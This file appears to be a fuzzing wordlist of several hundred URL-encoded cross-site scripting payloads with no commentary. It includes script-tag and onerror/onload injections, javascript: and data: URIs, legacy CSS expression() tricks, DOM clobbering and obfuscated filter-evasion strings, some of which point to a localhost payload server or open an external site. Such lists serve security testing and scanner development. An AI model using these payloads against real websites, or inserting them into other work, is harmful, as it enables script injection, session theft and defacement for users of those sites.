'%3E%3Cscript%3E%20var%20x%20=%20%22X/%22;%20alert(1);%20%3C/script%3E
%3Cimg%20src=%221%22%20onerror=%22alert(1)%22%3E
%22%3E%3Cimg%20src=%221%22%20onerror=%22alert(1)%22%3E
'%3E%3Cimg%20src=%221%22%20onerror=%22alert(1)%22%3E
%3Cimg%20src=%22%22%20onload=alert(1)%3E
%22%3E%3Cimg%20src=%22%22%20onload=alert(1)%3E
'%3E%3Cimg%20src=%22%22%20onload=alert(1)%3E
%3Cscript%3E%20function%20a()%20%7B%7D%20%3C/script%3E%20%3Cimg%20src=1%20onerror=%22a();alert(1)%22%3E
%22%3E%3Cscript%3E%20function%20a()%20%7B%7D%20%3C/script%3E%20%3Cimg%20src=1%20onerror=%22a();alert(1)%22%3E
'%3E%3Cscript%3E%20function%20a()%20%7B%7D%20%3C/script%3E%20%3Cimg%20src=1%20onerror=%22a();alert(1)%22%3E
%3Cimg%20src=1%20onerror=%22alert(1)%22%3E
%22%3E%3Cimg%20src=1%20onerror=%22alert(1)%22%3E
'%3E%3Cimg%20src=1%20onerror=%22alert(1)%22%3E
%3Cimg%20src=1%20onerror%22alert(1)%22%3E
%22%3E%3Cimg%20src=1%20onerror%22alert(1)%22%3E
'%3E%3Cimg%20src=1%20onerror%22alert(1)%22%3E
%3Csvg%3E%3Cscript%3Elo%3Csv%3EgChr(1)%3C/script%3E%3C/svg%3E
%22%3E%3Csvg%3E%3Cscript%3Elo%3Csv%3EgChr(1)%3C/script%3E%3C/svg%3E
'%3E%3Csvg%3E%3Cscript%3Elo%3Csv%3EgChr(1)%3C/script%3E%3C/svg%3E
%3Cimg%20src=
%3Ca%20href=x%20onerror=alert(1)%3E
%22%3E%3Ca%20href=x%20onerror=alert(1)%3E
'%3E%3Ca%20href=x%20onerror=alert(1)%3E
%3Cscript%3E%20var%20x%20=%20%22asdf/1%20asdf%22;%20alert(1);%20%3C/script%3E
%22%3E%3Cscript%3E%20var%20x%20=%20%22asdf/1%20asdf%22;%20alert(1);%20%3C/script%3E
'%3E%3Cscript%3E%20var%20x%20=%20%22asdf/1%20asdf%22;%20alert(1);%20%3C/script%3E
%3Cimg%20src=xx:xx;onerror=alert(1)%3E
%22%3E%3Cimg%20src=xx:xx;onerror=alert(1)%3E
'%3E%3Cimg%20src=xx:xx;onerror=alert(1)%3E
%3Cimg%20src=x%20%3E%20onerror=%22console.alert(document.getElementsByTagName('html')[0].innerHTML)%22%3E
%22%3E%3Cimg%20src=x%20%3E%20onerror=%22console.alert(document.getElementsByTagName('html')[0].innerHTML)%22%3E
'%3E%3Cimg%20src=x%20%3E%20onerror=%22console.alert(document.getElementsByTagName('html')[0].innerHTML)%22%3E
%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURIComponent(
%22%3E%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURIComponent(
'%3E%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURIComponent(
%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURI(
%22%3E%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURI(
'%3E%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURI(
%3Cimg%20src=x%20%3E%20onerror=alert(1)%3E
%22%3E%3Cimg%20src=x%20%3E%20onerror=alert(1)%3E
'%3E%3Cimg%20src=x%20%3E%20onerror=alert(1)%3E
%3Csvg%3E%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src=xx:xx%20onerror=%22&
%22%3E%3Cimg%20src=xx:xx%20onerror=%22&
'%3E%3Cimg%20src=xx:xx%20onerror=%22&
%3Cimg%20src=xx:xx%20onerror=window['alert']%3E
%22%3E%3Cimg%20src=xx:xx%20onerror=window['alert']%3E
'%3E%3Cimg%20src=xx:xx%20onerror=window['alert']%3E
%22'%3E%3Cimg%20src=%22xx:xx%22%20on%20error=%22alert(1);%22%3E
%3Cimg%20src=xx:xx%20onerror=alert(1)%3E
%22%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E
'%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E
%3Cimg%20src=xx:xx%20onerror%20=alert(1);%3E
%22%3E%3Cimg%20src=xx:xx%20onerror%20=alert(1);%3E
'%3E%3Cimg%20src=xx:xx%20onerror%20=alert(1);%3E
%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220.1;%20URL=javascript:void()//?;URL=javascript:alert(1)//%22%3E
%22%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220.1;%20URL=javascript:void()//?;URL=javascript:alert(1)//%22%3E
'%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220.1;%20URL=javascript:void()//?;URL=javascript:alert(1)//%22%3E
%3Cmeta%20http-equiv=refresh%20content=%22javascript:alert('1')%22%3E
%22%3E%3Cmeta%20http-equiv=refresh%20content=%22javascript:alert('1')%22%3E
'%3E%3Cmeta%20http-equiv=refresh%20content=%22javascript:alert('1')%22%3E
%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E
%22%3E%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E
'%3E%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E
%3Cscript%3E%20document.cookie='X';%20if(document.cookie%20!==%20'X')%20%7B%20alert(1,document.cookie);%20%7D%20%3C/script%3E
%22%3E%3Cscript%3E%20document.cookie='X';%20if(document.cookie%20!==%20'X')%20%7B%20alert(1,document.cookie);%20%7D%20%3C/script%3E
'%3E%3Cscript%3E%20document.cookie='X';%20if(document.cookie%20!==%20'X')%20%7B%20alert(1,document.cookie);%20%7D%20%3C/script%3E
htmlStr%20=%20'%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E
'%3E%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E';%20document.getElementById('body').innerHTML%20=%20htmlStr;%20try%20%7B%20alert(1);%7Dcatch(e)%7Balert(1);%7D;
'%3E%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E';%20document.getElementById('body').innerHTML%20=%20htmlStr;%20try%20%7B%20if(document.getElementById('body').firstChild.protocol%20===%20'javascript:')%20%7B%20alert(1);%20%7D%20%7Dcatch(e)%7Balert(1);%7D;
%3Cimg%20src=x:xx%20onerror=%22try%20%7BexecScript('a=1','vbs');alert(1);%7Dcatch(e)%7Balert(1);%7D%22%3E
%22%3E%3Cimg%20src=x:xx%20onerror=%22try%20%7BexecScript('a=1','vbs');alert(1);%7Dcatch(e)%7Balert(1);%7D%22%3E
'%3E%3Cimg%20src=x:xx%20onerror=%22try%20%7BexecScript('a=1','vbs');alert(1);%7Dcatch(e)%7Balert(1);%7D%22%3E
%3Cdiv%20style=%22color:red'%7B%7D%20x:expression(alert(1))%22%3E.%3C/div%3E
%22%3E%3Cdiv%20style=%22color:red'%7B%7D%20x:expression(alert(1))%22%3E.%3C/div%3E
'%3E%3Cdiv%20style=%22color:red'%7B%7D%20x:expression(alert(1))%22%3E.%3C/div%3E
%3Cimg%20src='xx:x%3E%3Cimg%20src=xx:x%20onerror=alert(1)%3E'%3E
%22%3E%3Cimg%20src='xx:x%3E%3Cimg%20src=xx:x%20onerror=alert(1)%3E'%3E
'%3E%3Cimg%20src='xx:x%3E%3Cimg%20src=xx:x%20onerror=alert(1)%3E'%3E
%3Cimg%20src='xx:x/%20onerror=%22alert(1)%22%3E'%3E
%22%3E%3Cimg%20src='xx:x/%20onerror=%22alert(1)%22%3E'%3E
'%3E%3Cimg%20src='xx:x/%20onerror=%22alert(1)%22%3E'%3E
%3Cimg%20src='xx:x%20onerror=%22alert(1)%22%3E'%3E
%22%3E%3Cimg%20src='xx:x%20onerror=%22alert(1)%22%3E'%3E
'%3E%3Cimg%20src='xx:x%20onerror=%22alert(1)%22%3E'%3E
%60%22'%3E%3Cimg%20src=%22
%3Cimg%20src=xx:xx%20onerror=%22x='/',alert(1)//'%22%3E
%22%3E%3Cimg%20src=xx:xx%20onerror=%22x='/',alert(1)//'%22%3E
'%3E%3Cimg%20src=xx:xx%20onerror=%22x='/',alert(1)//'%22%3E
%3Cscript%3Ealert(alert(1))%3C/script%3E
%22%3E%3Cscript%3Ealert(alert(1))%3C/script%3E
'%3E%3Cscript%3Ealert(alert(1))%3C/script%3E
%3Cscript%3Ex='%3Cscript%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E
'%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E';%3C/script%3E
%3Cscript%3Ealert(1)%3Cscript%3E%3C/script%3E
%22%3E%3Cscript%3Ealert(1)%3Cscript%3E%3C/script%3E
'%3E%3Cscript%3Ealert(1)%3Cscript%3E%3C/script%3E
--%3E%3Cimg%20src=xxx:x%20onerror=alert(1)%3E%20--%3E
%3Cimg%20src=xx:xx
%22%3E%3Cimg%20src=xx:xx
'%3E%3Cimg%20src=xx:xx
%3Cimg%20src=xx:xx%20alt=%60/onerror=alert(1)//%60%3E
%22%3E%3Cimg%20src=xx:xx%20alt=%60/onerror=alert(1)//%60%3E
'%3E%3Cimg%20src=xx:xx%20alt=%60/onerror=alert(1)//%60%3E
'%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E%20%3Ca%20href=javascript:alert(1)%3E1%3C/a%3E
%22%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E%20%3Ca%20href=javascript:alert(1)%3E1%3C/a%3E
%3Cscript%3Ealert(1,1%3C/script//)%3C/script%3E
%22%3E%3Cscript%3Ealert(1,1%3C/script//)%3C/script%3E
'%3E%3Cscript%3Ealert(1,1%3C/script//)%3C/script%3E
%3Cscript%3Ealert(1,1%3C/script/)%3C/script%3E
%22%3E%3Cscript%3Ealert(1,1%3C/script/)%3C/script%3E
'%3E%3Cscript%3Ealert(1,1%3C/script/)%3C/script%3E
%3Cbody%3E%20%C2%A7iframe%20onload=confirm(/X/)>%20%3Cimg%20src=x:x%20onerror=%22innerHTML=previousSibling.nodeValue.replace('%C2%A7','%3C')%22%3E%20%3C/body%3E
%22%3E%3Cbody%3E%20%C2%A7iframe%20onload=confirm(/X/)>%20%3Cimg%20src=x:x%20onerror=%22innerHTML=previousSibling.nodeValue.replace('%C2%A7','%3C')%22%3E%20%3C/body%3E
'%3E%3Cbody%3E%20%C2%A7iframe%20onload=confirm(/X/)>%20%3Cimg%20src=x:x%20onerror=%22innerHTML=previousSibling.nodeValue.replace('%C2%A7','%3C')%22%3E%20%3C/body%3E
%3Cb%20id=%22id1%22%20x=begin0x9fa0end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E
%22%3E%3Cb%20id=%22id1%22%20x=begin0x9fa0end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E
'%3E%3Cb%20id=%22id1%22%20x=begin0x9fa0end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E
%3Cb%20id=%22id1%22%20x=begin0x2924end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E
%22%3E%3Cb%20id=%22id1%22%20x=begin0x2924end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E
'%3E%3Cb%20id=%22id1%22%20x=begin0x2924end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E
%3Ctitle%3EX%3Cscript%3Ealert(1)%3C/script%3E
'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/title%3E
%3Cdiv%20style=%22X:expression(alert(1))/%22%3E%3C/div%3E
%22%3E%3Cdiv%20style=%22X:expression(alert(1))/%22%3E%3C/div%3E
'%3E%3Cdiv%20style=%22X:expression(alert(1))/%22%3E%3C/div%3E
%3Cdiv%20style=%22X:expression(alert(1))'%22%3E%3C/div%3E
%22%3E%3Cdiv%20style=%22X:expression(alert(1))'%22%3E%3C/div%3E
'%3E%3Cdiv%20style=%22X:expression(alert(1))'%22%3E%3C/div%3E
%3Cdiv%20style=%22X:expression(alert(1))%22%3E%3C/div%3E
%22%3E%3Cdiv%20style=%22X:expression(alert(1))%22%3E%3C/div%3E
'%3E%3Cdiv%20style=%22X:expression(alert(1))%22%3E%3C/div%3E
%3Cdiv%20style=%22X:expression(alert(1))%22%3EX/div%3E
%22%3E%3Cdiv%20style=%22X:expression(alert(1))%22%3EX/div%3E
'%3E%3Cdiv%20style=%22X:expression(alert(1))%22%3EX/div%3E
%3Cimg%20src=1%20title=%20x:xx/onerror=alert(1)%3E
%22%3E%3Cimg%20src=1%20title=%20x:xx/onerror=alert(1)%3E
'%3E%3Cimg%20src=1%20title=%20x:xx/onerror=alert(1)%3E
%3Cscript%3Eif(%22x/%22.length==2)%20%7B%20alert(1);%7D%3C/script%3E
%22%3E%3Cscript%3Eif(%22x/%22.length==2)%20%7B%20alert(1);%7D%3C/script%3E
'%3E%3Cscript%3Eif(%22x/%22.length==2)%20%7B%20alert(1);%7D%3C/script%3E
%3Cscript%3Eif(%22x/%22.length==1)%20%7B%20alert(1);%7D%3C/script%3E
%22%3E%3Cscript%3Eif(%22x/%22.length==1)%20%7B%20alert(1);%7D%3C/script%3E
'%3E%3Cscript%3Eif(%22x/%22.length==1)%20%7B%20alert(1);%7D%3C/script%3E
%3Cimg%20src=xxx:xxx%20title=1/onerror=alert(1)%3E
%22%3E%3Cimg%20src=xxx:xxx%20title=1/onerror=alert(1)%3E
'%3E%3Cimg%20src=xxx:xxx%20title=1/onerror=alert(1)%3E
%3Cscript%3Eif(%22xx%22%20==%20%22xx%22)%20%7B%20alert(1);%7D%3C/script%3E
%22%3E%3Cscript%3Eif(%22xx%22%20==%20%22xx%22)%20%7B%20alert(1);%7D%3C/script%3E
'%3E%3Cscript%3Eif(%22xx%22%20==%20%22xx%22)%20%7B%20alert(1);%7D%3C/script%3E
%3Cimg%20src=x%20onError=%22javascript:alert(1)%22/%3E
'%3E%3Cscript%20type=%22text/javascript%22%3Ealert(1);%3C/script%3E
%3Cscript%20charset='utf-8'%3Ealert(1)%3C/script%3E
%22%3E%3Cscript%20charset='utf-8'%3Ealert(1)%3C/script%3E
'%3E%3Cscript%20charset='utf-8'%3Ealert(1)%3C/script%3E
%3Cstyle%3E%3C/style%3E%3Cimg%20src=%22about:blank%22%20onerror=alert(1)//%3E%3C/style%3E
%22%3E%3Cstyle%3E%3C/style%3E%3Cimg%20src=%22about:blank%22%20onerror=alert(1)//%3E%3C/style%3E
'%3E%3Cstyle%3E%3C/style%3E%3Cimg%20src=%22about:blank%22%20onerror=alert(1)//%3E%3C/style%3E
%3Cscript%3Ea='X//';alert(1)//X';%3C/script%3E
%22%3E%3Cscript%3Ea='X//';alert(1)//X';%3C/script%3E
'%3E%3Cscript%3Ea='X//';alert(1)//X';%3C/script%3E
%3Cscript%3Etry%7Beval(%22%3C%3E%3C/%3E%22);alert(1)%7Dcatch(e)%7Balert(1)%7D;%3C/script%3E
%22%3E%3Cscript%3Etry%7Beval(%22%3C%3E%3C/%3E%22);alert(1)%7Dcatch(e)%7Balert(1)%7D;%3C/script%3E
'%3E%3Cscript%3Etry%7Beval(%22%3C%3E%3C/%3E%22);alert(1)%7Dcatch(e)%7Balert(1)%7D;%3C/script%3E
%3Cdiv%20class=%22foo1%22%3EX%3C/div%3E%20%3Cscript%3Edocument.getElementsByClassName('foo1')[0]?alert(1):0%3C/script%3E
%22%3E%3Cdiv%20class=%22foo1%22%3EX%3C/div%3E%20%3Cscript%3Edocument.getElementsByClassName('foo1')[0]?alert(1):0%3C/script%3E
'%3E%3Cdiv%20class=%22foo1%22%3EX%3C/div%3E%20%3Cscript%3Edocument.getElementsByClassName('foo1')[0]?alert(1):0%3C/script%3E
%22%60'/%3E%3Cimg/onload=alert(1)%20src=%22%22/%3E
%3C!--%3Cimg%20src=xxx:x%20onerror=alert(1)%3E%20--%3E
%22%3E%3C!--%3Cimg%20src=xxx:x%20onerror=alert(1)%3E%20--%3E
'%3E%3C!--%3Cimg%20src=xxx:x%20onerror=alert(1)%3E%20--%3E
%3Cscript%3E/%20/alert(1)//%20*/%3C/script%3E
%22%3E%3Cscript%3E/%20/alert(1)//%20*/%3C/script%3E
'%3E%3Cscript%3E/%20/alert(1)//%20*/%3C/script%3E
%22'%60%3EX%3Cdiv%20style=%22font-family:'foo;x:expression(alert(1));/';%22%3EX
%22'%60%3EX%3Cdiv%20style=%22font-family:'foo'x:expression(alert(1));/';%22%3EX
%22'%60%3E%3Cscript%3Ea=/X;;i=0;alert(1);a/i;%3C/script%3E
%3Ca%20href=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
'%3E%3Cscript%3Ealert(1)%3C/script%3E%22%20/%3E
%22'%60%3E%3Cp%3E%3Csvg%3E%3Cscript%3Ea='X;alert(1)//';%3C/script%3E%3C/p%3E
%3Cp%3E%3Csvg%3E%3Cscript%3Ealert(1)%3C/script%3E
'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/p%3E
%3Ciframe%20src=%22vbscript:alert()%3E%3C/iframe%3E
%22%3E%3Ciframe%20src=%22vbscript:alert()%3E%3C/iframe%3E
'%3E%3Ciframe%20src=%22vbscript:alert()%3E%3C/iframe%3E
X%3Cdiv%20style=%22x:expression(alert(1))%22%3EX
X%3Cdiv%20style=%22xexpression(alert(1))%22%3EX
%3Cscript%20src=%22data:text/plainalert(1)%22%3E%3C/script%3E
%22%3E%3Cscript%20src=%22data:text/plainalert(1)%22%3E%3C/script%3E
'%3E%3Cscript%20src=%22data:text/plainalert(1)%22%3E%3C/script%3E
%3Cscript%20src=%22data:,alert(1)%22%3E%3C/script%3E
%22%3E%3Cscript%20src=%22data:,alert(1)%22%3E%3C/script%3E
'%3E%3Cscript%20src=%22data:,alert(1)%22%3E%3C/script%3E
%3Cscript%20src=%22data:text/plain,alert(1)%22%3E%3C/script%3E
%22%3E%3Cscript%20src=%22data:text/plain,alert(1)%22%3E%3C/script%3E
'%3E%3Cscript%20src=%22data:text/plain,alert(1)%22%3E%3C/script%3E
%3Cscript%3E%20if%20('a'.trim()%20===%20'')%20%7B%20alert(1);%20%7D%20%3C/script%3E
%22%3E%3Cscript%3E%20if%20('a'.trim()%20===%20'')%20%7B%20alert(1);%20%7D%20%3C/script%3E
'%3E%3Cscript%3E%20if%20('a'.trim()%20===%20'')%20%7B%20alert(1);%20%7D%20%3C/script%3E
%22'%60%3E%3Cscript%3Ealert(1)%3C/script%3E
%22'%60%3E%3Cimg%20src=xxx:x%20onerror=alert(1)%3E
'%60%22%3E%3Cscript%3Ealert(1)%3C/script%3E
%60%22'%3E%3Cimg%20src=xxx:x%20onerror=alert(1)%3E
'%22%60%3E%3Cscript%3E/%20alert(1)//%20*/%3C/script%3E
%60'%22%3E%3Cscript%3Ewindow'alert'%3C/script%3E
/u0031+/u0031/u005b'/145/166/141/154'/u005d/u0028'/141/154/145/162/164/50/61/51'/u0029
/u0030/u005b/u0022/x65/x76/x61/x6C%22/u005d/u0028/u0027/x61/x6C/x65/x72/x74/x28/x31/x29'/u0029
0'eval'
%3Ca%20href=%22javascript:/u0031+/u0031/u005b'/145/166/141/154'/u005d/u0028'/141/154/145/162/164/50/61/51'/u0029%22%3EX%3C/a%3E
%22%3E%3Ca%20href=%22javascript:/u0031+/u0031/u005b'/145/166/141/154'/u005d/u0028'/141/154/145/162/164/50/61/51'/u0029%22%3EX%3C/a%3E
'%3E%3Ca%20href=%22javascript:/u0031+/u0031/u005b'/145/166/141/154'/u005d/u0028'/141/154/145/162/164/50/61/51'/u0029%22%3EX%3C/a%3E
%3Ca%20href=%22&
%22%3E%3Ca%20href=%22&
'%3E%3Ca%20href=%22&
%3Cinput%20id='1'%3E%3Cinput%20id=1%3E%3Cscript%3Ealert(1)%3C/script%3E
%22%3E%3Cinput%20id='1'%3E%3Cinput%20id=1%3E%3Cscript%3Ealert(1)%3C/script%3E
'%3E%3Cinput%20id='1'%3E%3Cinput%20id=1%3E%3Cscript%3Ealert(1)%3C/script%3E
%3Ca%20href=%22invalid:1%22%20id=x%20name=y%3EX%3C/a%3E%3Ca%20href=%22invalid:2%22%20id=x%20name=y%3EX%3C/a%3E%3Cscript%3Ealert(x.y[0])%3C/script%3E
%22%3E%3Ca%20href=%22invalid:1%22%20id=x%20name=y%3EX%3C/a%3E%3Ca%20href=%22invalid:2%22%20id=x%20name=y%3EX%3C/a%3E%3Cscript%3Ealert(x.y[0])%3C/script%3E
'%3E%3Ca%20href=%22invalid:1%22%20id=x%20name=y%3EX%3C/a%3E%3Ca%20href=%22invalid:2%22%20id=x%20name=y%3EX%3C/a%3E%3Cscript%3Ealert(x.y[0])%3C/script%3E
%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Cscript%3Ealert(x.removeChild)//undefinedalert(x.parentNode)//undefined%3C/script%3E
%22%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Cscript%3Ealert(x.removeChild)//undefinedalert(x.parentNode)//undefined%3C/script%3E
'%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Ca%20href=1%20name=x%3EX%3C/a%3E%3Cscript%3Ealert(x.removeChild)//undefinedalert(x.parentNode)//undefined%3C/script%3E
%3Ca%20href=%22123%22%20id=x%3EX%3C/a%3E%3Cscript%3Ex='javascript:alert(1)'//only%20in%20compat!;%3C/script%3E
%22%3E%3Ca%20href=%22123%22%20id=x%3EX%3C/a%3E%3Cscript%3Ex='javascript:alert(1)'//only%20in%20compat!;%3C/script%3E
'%3E%3Ca%20href=%22123%22%20id=x%3EX%3C/a%3E%3Cscript%3Ex='javascript:alert(1)'//only%20in%20compat!;%3C/script%3E
'%3E%3Cform%20name=self%20location=%22javascript:alert(1)%22%3E%3C/form%3E%3Cscript%3Eif(top!=self)%7B%20top.location=self.location%7D%3C/script%3E
%22%3E%3Cform%20name=self%20location=%22javascript:alert(1)%22%3E%3C/form%3E%3Cscript%3Eif(top!=self)%7B%20top.location=self.location%7D%3C/script%3E
%3Ciframe%20name=x%3E%3C/iframe%3E%22%3E%3C/iframe%3E%3Ca%20href=%22http://127.0.0.1:3555/xss_serve_payloads/X.html%22%20target=x%20id=x%3E%3C/a%3E%3Cscript%3Ewindow.onload=function()%7Bx.click()%7D%3C/script%3E
%22%3E%3Ciframe%20name=x%3E%3C/iframe%3E%22%3E%3C/iframe%3E%3Ca%20href=%22http://127.0.0.1:3555/xss_serve_payloads/X.html%22%20target=x%20id=x%3E%3C/a%3E%3Cscript%3Ewindow.onload=function()%7Bx.click()%7D%3C/script%3E
'%3E%3Ciframe%20name=x%3E%3C/iframe%3E%22%3E%3C/iframe%3E%3Ca%20href=%22http://127.0.0.1:3555/xss_serve_payloads/X.html%22%20target=x%20id=x%3E%3C/a%3E%3Cscript%3Ewindow.onload=function()%7Bx.click()%7D%3C/script%3E
%3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(1)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E
%22onmouseover=%22alert(1)%22a=%22
'onmouseover='alert(1)'a='
'%20onmouseover=alert(1)'
%22%20onmouseover=javascript:alert(1)%20%22
/');alert(1);//
);alert(1)//
');alert(1)//
%26%2339;-alert(1)//
%22);alert(1);//
%E0%3Cbody%20onload=alert(1)%3E
X'%20alert(1)%2F%2F
X%22%20alert(1)%2F%2F
%5C%5C'%2Balert(1)%3B%2F%2F
%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
alert(1)%3B
%3Cscript%3Ea%3D%2FX%2F
alert(1)%3C%2Fscript%3E
%22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
X%20-%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
X%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
%3CSCRIPT%3Ealert(1);%3C/SCRIPT%3E
%3CMETA%20HTTP-EQUIV=%22Link%22%20Content=%22%3Cjavascript:alert(1)%3E;%20REL=stylesheet%22%3E
%22%3E%3CMETA%20HTTP-EQUIV=%22Link%22%20Content=%22%3Cjavascript:alert(1)%3E;%20REL=stylesheet%22%3E
'%3E%3CMETA%20HTTP-EQUIV=%22Link%22%20Content=%22%3Cjavascript:alert(1)%3E;%20REL=stylesheet%22%3E
'%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E
%22%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E
%3C!--%3Cvalue%3E%3C![CDATA[%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas%3C![CDATA[cript:alert(1);%22%3E
%22%3E%3C!--%3Cvalue%3E%3C![CDATA[%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas%3C![CDATA[cript:alert(1);%22%3E
'%3E%3C!--%3Cvalue%3E%3C![CDATA[%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas%3C![CDATA[cript:alert(1);%22%3E
'%3E%3Cimg%20src=a%20onerror=alert(1)%20%0A%3E
%22%3E%3Cimg%20src=a%20onerror=alert(1)%20%0A%3E
%3Cimg%20src=%22x%22%20class=%22''onerror=alert(1)%22%3E
%22%3E%3Cimg%20src=%22x%22%20class=%22''onerror=alert(1)%22%3E
'%3E%3Cimg%20src=%22x%22%20class=%22''onerror=alert(1)%22%3E
0%3Caside%20xmlns=%22x%3E%3Cimg%20src=x%20onerror=alert(1)%22%3E1%3C/aside%3E
0%3Caside%20xmlns=%22x%3E%3Cscript%3Ealert(1)%3C/script%3E
'%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E1%3C/aside%3E
0%3Caside%20xmlns=%22foo:img%20src=x%20onerror=alert(1)%3E%22%3E123
%3Cp%20%20style=%22font-family:'/22/3bx:expression(alert(1))/'%22%3E
%22%3E%3Cp%20%20style=%22font-family:'/22/3bx:expression(alert(1))/'%22%3E
'%3E%3Cp%20%20style=%22font-family:'/22/3bx:expression(alert(1))/'%22%3E
%3Cp%20style=%22font-family:%20'foo/27/3b%20color/3a%20expression(alert(1))/
%22%3E%3Cp%20style=%22font-family:%20'foo/27/3b%20color/3a%20expression(alert(1))/*
'%3E%3Cp%20style=%22font-family:%20'foo/27/3b%20color/3a%20expression(alert(1))/*
%3Cp%20style=%22fon/22/3e/3cimg/20src/3dx/20onerror/3d%20alert/28%201/29/3et-family:'foobar'%22%3E
%22%3E%3Cp%20style=%22fon/22/3e/3cimg/20src/3dx/20onerror/3d%20alert/28%201/29/3et-family:'foobar'%22%3E
'%3E%3Cp%20style=%22fon/22/3e/3cimg/20src/3dx/20onerror/3d%20alert/28%201/29/3et-family:'foobar'%22%3E
%3Cp%20style=%22filter:%20'expression(alert(1))'%22%3E
%22%3E%3Cp%20style=%22filter:%20'expression(alert(1))'%22%3E
'%3E%3Cp%20style=%22filter:%20'expression(alert(1))'%22%3E
%3Cp%20style=%22font-family:%20'foo&x5c;27&
%22%3E%3Cp%20style=%22font-family:%20'foo&x5c;27&
'%3E%3Cp%20style=%22font-family:%20'foo&x5c;27&
%3Ciframe/src=%22data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==%22%3E
%22%3E%3Ciframe/src=%22data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==%22%3E
'%3E%3Ciframe/src=%22data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==%22%3E
%3Csvg%3E%3Cscript%20xlink:href=data:,window.open('http://www.opensecurity.in')%3E%3C/script
%22%3E%3Csvg%3E%3Cscript%20xlink:href=data:,window.open('http://www.opensecurity.in')%3E%3C/script
'%3E%3Csvg%3E%3Cscript%20xlink:href=data:,window.open('http://www.opensecurity.in')%3E%3C/script
http://www.opensecurity%3Cscript%20.in%3Ealert(document.location)%3C/script
perl%20-e%20'print%20%22<IMG%20SRC=java/0script:alert(/%22X/%22)>%22;'%20>%20out
perl%20-e%20'print%20%22<SCR/0IPT>alert(/%22X/%22)</SCR/0IPT>%22;'%20>%20out
perl%20-e%20'print%20%22%3CIMG%20SRC=java/0script:alert(1)%3E%22;'%3E%20out
window%22ale%22+(!![]+[])[-~[]]+(!![]+[])[+[]]
window%22ale%22+%22/x72/x74%22
window%22/x61/x6c/x65/x72/x74%22
window'ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]
window'ale'+'/x72/x74'
window'/x61/x6c/x65/x72/x74'
window(+%7B%7D+[])[-[]]+(![]+[])[--[]]+([][+[]]+[])[---[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]
